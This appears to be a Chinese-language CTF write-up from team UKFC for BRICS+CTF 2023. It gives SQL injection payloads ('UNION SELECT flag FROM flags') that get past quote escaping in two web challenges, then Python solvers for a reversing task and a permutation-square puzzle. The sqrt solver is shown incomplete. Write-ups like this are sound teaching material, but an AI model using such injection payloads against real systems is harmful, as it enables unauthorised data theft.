Featured image of post BRICS+CTF 2023
Writeup

BRICS+CTF 2023

UKFC 2023 BRICS+CTF Writeup

Web

ChadGPT

  • 反斜杠注释引号可控
1
2


{"q":"aaaaaaaaaaaaaaaaaaaaaa\\' UNION SELECT flag FROM flags #"}

GigaChadGPT 

1
2
3

if err := json.NewDecoder(tee).Decode(&j); err != nil {
        return true
}

1
2

{"q":"aaaaaaaaaaaaaaaaaaaaaa
'UNION SELECT flag FROM flags#"}

shellcode????

  • 造了一个自己的输出格式系统
  • 注意 google 原函数,看一下真正的参数
1
2
3
4
5
6
7
8

temp = 0xFFFFFFFF
res = [0xFFF1D63C,0xFFEE7C50,0xFFE8D24E,0xFFE3B18D,0xFFFE7D90,0xFFF32412,0xFFFE6C39,0xFFF3112A,0xFFF24223,0xFFF31A25,0xFFFE8490,0xFFF316C5,0xFFE7C35C,0xFFFE57B0,0xFFEAA081,0xFFE99861,0xFFFE1D16,0xFFE85900,0xFFFE6818,0xFFF31065,0xFFE7AB43,0xFFF2FE92,0xFFFE8021,0xFFF0E101,0xFFEE03B9,0xFFF1E081]
for i in range(len(res)):
    res[i] = temp - res[i]
key = ['b','i','s','{','0','_','0','_','a','_','0','_','u','1','p','r','3','t','1','_','u','_','0','d','j','b']
for i in range(len(res)):
    print(key[i],end='')
    print(chr(int(pow(pow(ord(key[i]),3) - res[i], 1/2))),end='')

sqrt

  • 排列 P*P = x,已知 x 求 P
  • 将 P 拆分为子循环,然后根据排列平方的循环规则,推到原始循环,得到原始可能排列进行爆破
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

import hashlib

## 构造原排列
def restore_arrangement_from_cycles(cycles):
    n = 256
    arrangement = [0] * n

    for cycle in cycles:
        for i, element in enumerate(cycle):
            arrangement[element - 1] = cycle[(i + 1) % len(cycle)]


    return arrangement


## 枚举原始的子循环可能
e = []
d = []
b = []

## 构造
for j in b:
    for m in e:
        for k in d:
            cycles = []
            cycles.append(j)
            cycles.append(c)
            for l in m:
                cycles.append(l)
            for l in k:
                cycles.append(l)
            s = [18, 188, 48, 47, 100, 234, 225, 8, 187, 34, 124, 113, 118, 252, 137, 196, 125, 20, 251, 168, 167, 5, 225, 134, 66, 203, 26, 148, 63, 181, 213, 124, 170, 234, 35, 120, 47, 69, 157, 69, 194]
            permutations = restore_arrangement_from_cycles(cycles)

            res = [x ^ y for x, y in zip(hashlib.sha512(str(permutations).encode()).digest(), s)]
            string = ''.join(chr(code) for code in res)
            if 'brics+' in string:
                print(string)
Licensed under CC BY-NC-SA 4.0
© 2024 - 2025 UKFC
使用 Hugo 构建
主题 StackJimmy 设计